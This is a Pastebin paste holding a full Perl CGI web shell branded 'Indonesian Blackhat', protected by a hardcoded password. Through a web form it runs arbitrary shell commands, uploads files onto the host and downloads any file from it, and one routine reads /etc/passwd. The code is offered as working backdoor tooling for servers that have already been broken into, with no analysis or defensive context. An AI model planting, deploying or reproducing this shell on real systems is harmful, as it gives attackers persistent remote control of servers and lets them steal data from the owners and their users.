API tools faq
paste
Advertisement
xtartech

cgi

xtartech
Mar 29th, 2017
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.10 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  4. $CommandTimeoutDuration = 300;
  5. $ShowDynamicOutput = 1;
  6. $password = "jkt48";
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27.  
  28. # handle file upload data
  29. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  30. {
  31. $Boundary = '--'.$1; # please refer to RFC1867
  32. @list = split(/$Boundary/, $in);
  33. $HeaderBody = $list[1];
  34. $HeaderBody =~ /\r\n\r\n|\n\n/;
  35. $Header = $`;
  36. $Body = $';
  37. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  38. $in{'filedata'} = $Body;
  39. $Header =~ /filename=\"(.+)\"/;
  40. $in{'f'} = $1;
  41. $in{'f'} =~ s/\"//g;
  42. $in{'f'} =~ s/\s//g;
  43.  
  44. # parse trailer
  45. for($i=2; $list[$i]; $i++)
  46. {
  47. $list[$i] =~ s/^.+name=$//;
  48. $list[$i] =~ /\"(\w+)\"/;
  49. $key = $1;
  50. $val = $';
  51. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  52. $val =~ s/%(..)/pack("c", hex($1))/ge;
  53. $in{$key} = $val;
  54. }
  55. }
  56. else # standard post data (url encoded, not multipart)
  57. {
  58. @in = split(/&/, $in);
  59. foreach $i (0 .. $#in)
  60. {
  61. $in[$i] =~ s/\+/ /g;
  62. ($key, $val) = split(/=/, $in[$i], 2);
  63. $key =~ s/%(..)/pack("c", hex($1))/ge;
  64. $val =~ s/%(..)/pack("c", hex($1))/ge;
  65. $in{$key} .= "\0" if (defined($in{$key}));
  66. $in{$key} .= $val;
  67. }
  68. }
  69. }
  70.  
  71. #------------------------------------------------------------------------------
  72. # Prints the HTML Page Header
  73. # Argument 1: Form item name to which focus should be set
  74. #------------------------------------------------------------------------------
  75. sub foo
  76. {
  77. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  78.  
  79. my %HoH = ();
  80.  
  81. my $file = '/etc/passwd';
  82. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  83.  
  84. while( <PASSWD> ) {
  85. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  86.  
  87. $HoH{ $login }{ 'uid' } = $uid;
  88. $HoH{ $login }{ 'gid' } = $gid;
  89. $HoH{ $login }{ 'dir' } = $dir;
  90. }
  91.  
  92. close PASSWD;
  93.  
  94. return \%HoH;
  95. }
  96. sub PrintPageHeader
  97. {
  98. $EncodedCurrentDir = $CurrentDir;
  99. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  100. print "Content-type: text/html\n\n";
  101. print <<END;
  102. <html>
  103. <head>
  104. <title>Perl Privat Shell</title>
  105. <LINK rel="SHORTCUT ICON" href="http://i.imgur.com/n54dIAD.gif">
  106. $HtmlMetaHeader
  107. </head>
  108. <center><h4 style="font-size:50px;text-shadow: 1px 1px 5px red;">Indonesian Blackhat</h4></center>
  109. <body><BODY BGCOLOR="#000000" repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  110. <td colspan="2" bgcolor="black"><p align="center">s<font face="Verdana" size="2">
  111. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  112. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  113. <a href="$ScriptLocation?a=logout">Sign Out</a>
  114. <table border="0" width="100%" cellspacing="0" cellpadding="2">
  115. <p align="center"><font face="Verdana" size="3" color="GREEN">Nginx1337 - Server : <font color="gray">$ServerName</font></font>
  116. </tr>
  117. <tr>
  118. </font></td>
  119. </tr>
  120. </table>
  121. <br><center><b><font face="Courier New" size="4" color="RED">Use at <b><font face="Courier New" size="4" color="WHITE"> your own risk ^_~</font></center>
  122. <font color="GREEN" size="3">
  123. END
  124. }
  125.  
  126. #------------------------------------------------------------------------------
  127. # Prints the Login Screen
  128. #------------------------------------------------------------------------------
  129. sub PrintLoginScreen
  130. {
  131. $Message = q$<pre><font color="GREEN">
  132. -- Enter Password --
  133. </font></pre>
  134. $;
  135. #'
  136. print <<END;
  137. $Message
  138. END
  139. }
  140.  
  141. #------------------------------------------------------------------------------
  142. # Prints the message that informs the user of a failed login
  143. #------------------------------------------------------------------------------
  144. sub PrintLoginFailedMessage
  145. {
  146. print <<END;
  147. <code>
  148. <br>login: root<br>
  149. password:<br>
  150. wrong password !!<br><br>
  151. </code>
  152. END
  153. }
  154.  
  155. #------------------------------------------------------------------------------
  156. # Prints the HTML form for logging in
  157. #------------------------------------------------------------------------------
  158. sub PrintLoginForm
  159. {
  160. print <<END;
  161. <code>
  162. <form name="f" method="POST" action="$ScriptLocation">
  163. <input type="hidden" name="a" value="login"><font color="green">Password : </font><input type="password" name="p">
  164. <input type="submit" value="Enter">
  165. </form>
  166. </code>
  167. END
  168. }
  169.  
  170. #------------------------------------------------------------------------------
  171. # Prints the footer for the HTML Page
  172. #------------------------------------------------------------------------------
  173. sub PrintPageFooter
  174. {
  175. print "</font></body></html>";
  176. }
  177.  
  178. #------------------------------------------------------------------------------
  179. # Retreives the values of all cookies. The cookies can be accesses using the
  180. # variable $Cookies{'}
  181. #------------------------------------------------------------------------------
  182. sub GetCookies
  183. {
  184. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  185. foreach $cookie(@httpcookies)
  186. {
  187. ($id, $val) = split(/=/, $cookie);
  188. $Cookies{$id} = $val;
  189. }
  190. }
  191.  
  192. #------------------------------------------------------------------------------
  193. # Prints the screen when the user logs out
  194. #------------------------------------------------------------------------------
  195. sub PrintLogoutScreen
  196. {
  197. print "<code>Connection closed by foreign host.<br><br></code>";
  198. }
  199.  
  200. #------------------------------------------------------------------------------
  201. # Logs out the user and allows the user to login again
  202. #------------------------------------------------------------------------------
  203. sub PerformLogout
  204. {
  205. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  206. &PrintPageHeader("p");
  207. &PrintLogoutScreen;
  208. &PrintLoginScreen;
  209. &PrintLoginForm;
  210. &PrintPageFooter;
  211. }
  212.  
  213. #------------------------------------------------------------------------------
  214. # This function is called to login the user. If the password matches, it
  215. # displays a page that allows the user to run commands. If the password doens't
  216. # match or if no password is entered, it displays a form that allows the user
  217. # to login
  218. #------------------------------------------------------------------------------
  219. sub PerformLogin
  220. {
  221. if($LoginPassword eq $password) # password matched
  222. {
  223. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  224. &PrintPageHeader("c");
  225. &PrintCommandLineInputForm;
  226. &PrintPageFooter;
  227. }
  228. else # password didn't match
  229. {
  230. &PrintPageHeader("p");
  231. &PrintLoginScreen;
  232. if($LoginPassword ne "") # some password was entered
  233. {
  234. &PrintLoginFailedMessage;
  235. }
  236. &PrintLoginForm;
  237. &PrintPageFooter;
  238. }
  239. }
  240.  
  241. #------------------------------------------------------------------------------
  242. # Prints the HTML form that allows the user to enter commands
  243. #------------------------------------------------------------------------------
  244. sub PrintCommandLineInputForm
  245. {
  246. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  247. print <<END;
  248. <code>
  249. <form name="f" method="POST" action="$ScriptLocation">
  250. <input type="hidden" name="a" value="command">
  251. <input type="hidden" name="d" value="$CurrentDir">
  252. <font color="GREEN">$Prompt</font>
  253. <input type="text" name="c" size="25">
  254. <input type="submit" value="Enter">
  255. </form>
  256. </code>
  257.  
  258. END
  259. }
  260.  
  261. #------------------------------------------------------------------------------
  262. # Prints the HTML form that allows the user to download files
  263. #------------------------------------------------------------------------------
  264. sub PrintFileDownloadForm
  265. {
  266. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  267. print <<END;
  268. <code>
  269. <form name="f" method="POST" action="$ScriptLocation">
  270. <input type="hidden" name="d" value="$CurrentDir">
  271. <input type="hidden" name="a" value="download">
  272. $Prompt download<br><br>
  273. Filename: <input type="text" name="f" size="35"><br><br>
  274. Download: <input type="submit" value="Jebret">
  275. </form>
  276. </code>
  277. END
  278. }
  279.  
  280. #------------------------------------------------------------------------------
  281. # Prints the HTML form that allows the user to upload files
  282. #------------------------------------------------------------------------------
  283. sub PrintFileUploadForm
  284. {
  285. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  286. print <<END;
  287. <code>
  288. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  289. $Prompt upload<br><br>
  290. Filename: <input type="file" name="f" size="35"><br><br>
  291. Options: <input type="checkbox" name="o" value="overwrite">
  292. Overwrite if it Exists<br><br>
  293. Upload: <input type="submit" value="cr00t">
  294. <input type="hidden" name="d" value="$CurrentDir">
  295. <input type="hidden" name="a" value="upload">
  296. </form>
  297. </code>
  298. END
  299. }
  300.  
  301. #------------------------------------------------------------------------------
  302. # This function is called when the timeout for a command expires. We need to
  303. # terminate the script immediately. This function is valid only on Unix. It is
  304. # never called when the script is running on NT.
  305. #------------------------------------------------------------------------------
  306. sub CommandTimeout
  307. {
  308. if(!$WinNT)
  309. {
  310. alarm(0);
  311. print <<END;
  312. </xmp>
  313. <code>
  314. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  315. <br>Killed it!
  316. <code>
  317. END
  318. &PrintCommandLineInputForm;
  319. &PrintPageFooter;
  320. exit;
  321. }
  322. }
  323.  
  324. #------------------------------------------------------------------------------
  325. # This function is called to execute commands. It displays the output of the
  326. # command and allows the user to enter another command. The change directory
  327. # command is handled differently. In this case, the new directory is stored in
  328. # an internal variable and is used each time a command has to be executed. The
  329. # output of the change directory command is not displayed to the users
  330. # therefore error messages cannot be displayed.
  331. #------------------------------------------------------------------------------
  332. sub ExecuteCommand
  333. {
  334. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  335. {
  336. # we change the directory internally. The output of the
  337. # command is not displayed.
  338.  
  339. $OldDir = $CurrentDir;
  340. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  341. chop($CurrentDir = `$Command`);
  342. &PrintPageHeader("c");
  343. &PrintCommandLineInputForm;
  344. print "<div style='float: center; text-align: left;'>";
  345. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  346. print "<code>$Prompt $RunCommand</code>";
  347. }
  348. else # some other command, display the output
  349. {
  350. &PrintPageHeader("c");
  351. &PrintCommandLineInputForm;
  352. print "<div style='float: center; text-align: left;'>";
  353. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  354. print "<code>$Prompt $RunCommand</code><xmp style='color: #00FF00;'>";
  355. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  356. if(!$WinNT)
  357. {
  358. $SIG{'ALRM'} = \&CommandTimeout;
  359. alarm($CommandTimeoutDuration);
  360. }
  361. if($ShowDynamicOutput) # show output as it is generated
  362. {
  363. $|=1;
  364. $Command .= " |";
  365. open(CommandOutput, $Command);
  366. while(<CommandOutput>)
  367. {
  368. $_ =~ s/(\n|\r\n)$//;
  369. print "$_\n";
  370. }
  371. $|=0;
  372. }
  373. else # show output after command completes
  374. {
  375. print `$Command`;
  376. }
  377. if(!$WinNT)
  378. {
  379. alarm(0);
  380. }
  381. print "</xmp>";
  382. }
  383. print "</div>";
  384. &PrintPageFooter;
  385. }
  386.  
  387. #------------------------------------------------------------------------------
  388. # This function displays the page that contains a link which allows the user
  389. # to download the specified file. The page also contains a auto-refresh
  390. # feature that starts the download automatically.
  391. # Argument 1: Fully qualified filename of the file to be downloaded
  392. #------------------------------------------------------------------------------
  393. sub PrintDownloadLinkPage
  394. {
  395. local($FileUrl) = @_;
  396. if(-e $FileUrl) # if the file exists
  397. {
  398. # encode the file link so we can send it to the browser
  399. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  400. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  401. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  402. &PrintPageHeader("c");
  403. print <<END;
  404. <code>
  405. Sending File $TransferFile...<br>
  406. If the download does not start automatically,
  407. <a href="$DownloadLink">Click Here</a>.
  408. </code>
  409. END
  410. &PrintCommandLineInputForm;
  411. &PrintPageFooter;
  412. }
  413. else # file doesn't exist
  414. {
  415. &PrintPageHeader("f");
  416. print "<code>Failed to download $FileUrl: $!</code>";
  417. &PrintFileDownloadForm;
  418. &PrintPageFooter;
  419. }
  420. }
  421.  
  422. #------------------------------------------------------------------------------
  423. # This function reads the specified file from the disk and sends it to the
  424. # browser, so that it can be downloaded by the user.
  425. # Argument 1: Fully qualified pathname of the file to be sent.
  426. #------------------------------------------------------------------------------
  427. sub SendFileToBrowser
  428. {
  429. local($SendFile) = @_;
  430. if(open(SENDFILE, $SendFile)) # file opened for reading
  431. {
  432. if($WinNT)
  433. {
  434. binmode(SENDFILE);
  435. binmode(STDOUT);
  436. }
  437. $FileSize = (stat($SendFile))[7];
  438. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  439. print "Content-Type: application/x-unknown\n";
  440. print "Content-Length: $FileSize\n";
  441. print "Content-Disposition: attachment; filename=$1\n\n";
  442. print while(<SENDFILE>);
  443. close(SENDFILE);
  444. }
  445. else # failed to open file
  446. {
  447. &PrintPageHeader("f");
  448. print "<code>Failed to download $SendFile: $!</code>";
  449. &PrintFileDownloadForm;
  450. &PrintPageFooter;
  451. }
  452. }
  453.  
  454.  
  455. #------------------------------------------------------------------------------
  456. # This function is called when the user downloads a file. It displays a message
  457. # to the user and provides a link through which the file can be downloaded.
  458. # This function is also called when the user clicks on that link. In this case,
  459. # the file is read and sent to the browser.
  460. #------------------------------------------------------------------------------
  461. sub BeginDownload
  462. {
  463. # get fully qualified path of the file to be downloaded
  464. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  465. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  466. {
  467. $TargetFile = $TransferFile;
  468. }
  469. else # path is relative
  470. {
  471. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  472. $TargetFile .= $PathSep.$TransferFile;
  473. }
  474.  
  475. if($Options eq "go") # we have to send the file
  476. {
  477. &SendFileToBrowser($TargetFile);
  478. }
  479. else # we have to send only the link page
  480. {
  481. &PrintDownloadLinkPage($TargetFile);
  482. }
  483. }
  484.  
  485. #------------------------------------------------------------------------------
  486. # This function is called when the user wants to upload a file. If the
  487. # file is not specified, it displays a form allowing the user to specify a
  488. # file, otherwise it starts the upload process.
  489. #------------------------------------------------------------------------------
  490. sub UploadFile
  491. {
  492. # if no file is specified, print the upload form again
  493. if($TransferFile eq "")
  494. {
  495. &PrintPageHeader("f");
  496. &PrintFileUploadForm;
  497. &PrintPageFooter;
  498. return;
  499. }
  500. &PrintPageHeader("c");
  501.  
  502. # start the uploading process
  503. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  504.  
  505. # get the fullly qualified pathname of the file to be created
  506. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  507. $TransferFile =~ m!([^/^\\]*)$!;
  508. $TargetName .= $PathSep.$1;
  509.  
  510. $TargetFileSize = length($in{'filedata'});
  511. # if the file exists and we are not supposed to overwrite it
  512. if(-e $TargetName && $Options ne "overwrite")
  513. {
  514. print "Failed: Destination file already exists.<br>";
  515. }
  516. else # file is not present
  517. {
  518. if(open(UPLOADFILE, ">$TargetName"))
  519. {
  520. binmode(UPLOADFILE) if $WinNT;
  521. print UPLOADFILE $in{'filedata'};
  522. close(UPLOADFILE);
  523. print "Transfered $TargetFileSize Bytes.<br>";
  524. print "File Path: $TargetName<br>";
  525. }
  526. else
  527. {
  528. print "Failed: $!<br>";
  529. }
  530. }
  531. print "</code>";
  532. &PrintCommandLineInputForm;
  533. &PrintPageFooter;
  534. }
  535.  
  536. #------------------------------------------------------------------------------
  537. # This function is called when the user wants to download a file. If the
  538. # filename is not specified, it displays a form allowing the user to specify a
  539. # file, otherwise it displays a message to the user and provides a link
  540. # through which the file can be downloaded.
  541. #------------------------------------------------------------------------------
  542. sub DownloadFile
  543. {
  544. # if no file is specified, print the download form again
  545. if($TransferFile eq "")
  546. {
  547. &PrintPageHeader("f");
  548. &PrintFileDownloadForm;
  549. &PrintPageFooter;
  550. return;
  551. }
  552.  
  553. # get fully qualified path of the file to be downloaded
  554. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  555. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  556. {
  557. $TargetFile = $TransferFile;
  558. }
  559. else # path is relative
  560. {
  561. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  562. $TargetFile .= $PathSep.$TransferFile;
  563. }
  564.  
  565. if($Options eq "go") # we have to send the file
  566. {
  567. &SendFileToBrowser($TargetFile);
  568. }
  569. else # we have to send only the link page
  570. {
  571. &PrintDownloadLinkPage($TargetFile);
  572. }
  573. }
  574.  
  575. #------------------------------------------------------------------------------
  576. # Main Program - Execution Starts Here
  577. #------------------------------------------------------------------------------
  578. &ReadParse;
  579. &GetCookies;
  580.  
  581. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  582. $ServerName = $ENV{'SERVER_NAME'};
  583. $LoginPassword = $in{'p'};
  584. $RunCommand = $in{'c'};
  585. $TransferFile = $in{'f'};
  586. $Options = $in{'o'};
  587.  
  588. $Action = $in{'a'};
  589. $Action = "login" if($Action eq ""); # no action specified, use default
  590.  
  591. # get the directory in which the commands will be executed
  592. $CurrentDir = $in{'d'};
  593. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  594.  
  595. $LoggedIn = $Cookies{'SAVEDPWD'} eq $password;
  596.  
  597. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  598. {
  599. &PerformLogin;
  600. }
  601. elsif($Action eq "command") # user wants to run a command
  602. {
  603. &ExecuteCommand;
  604. }
  605. elsif($Action eq "upload") # user wants to upload a file
  606. {
  607. &UploadFile;
  608. }
  609. elsif($Action eq "download") # user wants to download a file
  610. {
  611. &DownloadFile;
  612. }
  613. elsif($Action eq "logout") # user wants to logout
  614. {
  615. &PerformLogout;
  616. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!